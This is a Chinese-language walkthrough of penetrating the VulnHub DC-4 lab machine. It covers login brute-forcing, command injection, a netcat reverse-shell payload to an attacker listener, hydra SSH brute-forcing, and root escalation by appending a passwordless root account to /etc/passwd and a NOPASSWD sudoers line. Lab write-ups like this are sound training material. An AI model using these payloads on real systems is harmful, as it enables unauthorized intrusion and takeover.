VulnHub系列 DC-4靶机详细渗透测试过程

一、将靶机导入到虚拟机当中

靶机地址：

https://download.vulnhub.com/dc/DC-4.zip

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

端口扫描

nmap -p- 192.168.43.27

开放了22端口和80端口，可以再扫一下服务

nmap -p80,22 -sV -A 192.168.43.27

识别一下web服务，看有什么信息

whatweb http://192.168.43.27

并没有什么有价值的东西可利用，接下来访问Web界面

Web渗透

暴力破解

来到web界面，发现为登录界面，根据页面提示为管理员登录，但是通过简单信息收集并没有什么有效的信息，那么直接进行弱口令暴力破解

输入用户名admin，密码随意，抓取登录数据包，进行暴力破解

发送请求，等待即可，根据响应大小判断得到结果，密码为happy

命令执行

回到后台，等登录即可，进入后台，发现有命令工具，进入查看，点击run，发现执行了ls -l命令得回显内容，抓包看一下

尝试将命令换成其他命令，如whoami，观察是否回显，直接可反弹shell

成功回显，接下来进行反弹shell操作，通过nc反弹

反弹shell

radio=nc+-e+/bin/bash+192.168.43.105+8888&submit=%E8%B7%91

kail端开启nc监听，成功接收到shell

获取一个稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

观察当前目录下没有什么可用可看的文件，回答家目录查看一下，有无可用的信息

SSH暴力破解

到/home目录下发现有三个用户的家目录，那么我们依次进入，发现只有jim的家目录不为空，其他两个家目录都为空

/home/jim目录下有三个文件，分别查看一下

通过test.sh脚本的提示信息，再加上查看发现的backups目录当中有密码信息，通过我们得到的三个用户名信息，再加上这个密码信息，可以尝试ssh爆破登录，观察是否可成功爆破出ssh用户的登录密码

先将获取的用户名和密码分别保存到文本文件当中，接下来进行爆破

hydra -L user.txt -P passwd.txt ssh://192.168.43.27

通过ssh爆破，成功爆破出jim的ssh登录密码，接下来我们以用户名jim远程登录到靶机当中，进行下一步的操作

远程登录

查找一下目录，看有无重要信息

通过仔细观察我们发现有一个邮件，我们查看一下

去往此目录，查看jim文件得内容信息，发现charles发来的邮件，并有连接密码

得到charles的ssh远程登录密码，进行远程登录操作

然后我们再次通过charles用户进行远程登录，成功登录，发现也有邮件，查看一下，并无有用的信息

提权

接下来进行提权，提权三步走

//查找suid权限的有无可利用
find / -perm -u=s -type f 2>/dev/null

su和sudo可利用一下，但是均没成功

//列出目前用户可执行与无法执行的指令；
sudo -l 查看

发现在charles当中的sudo -l命令当中存在以root权限执行的命令

查看此命令帮助，如何使用

teehee --help

翻译：我们使用-a参数

那么接下来我们可以直接向/etc/passwd 文件当中写入,查看一下/etc/passwd文件信息

//空密码，直接追加到/etc/passwd
echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd或 修改charles权限，给予"为所欲为"权限
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"

直接切换admin用户，发现charles无法切换，换jim用户切换成功，成功提权

su - admin

jim用户切换成功：

成功提权，通关

文章不妥之处，欢迎批评指正！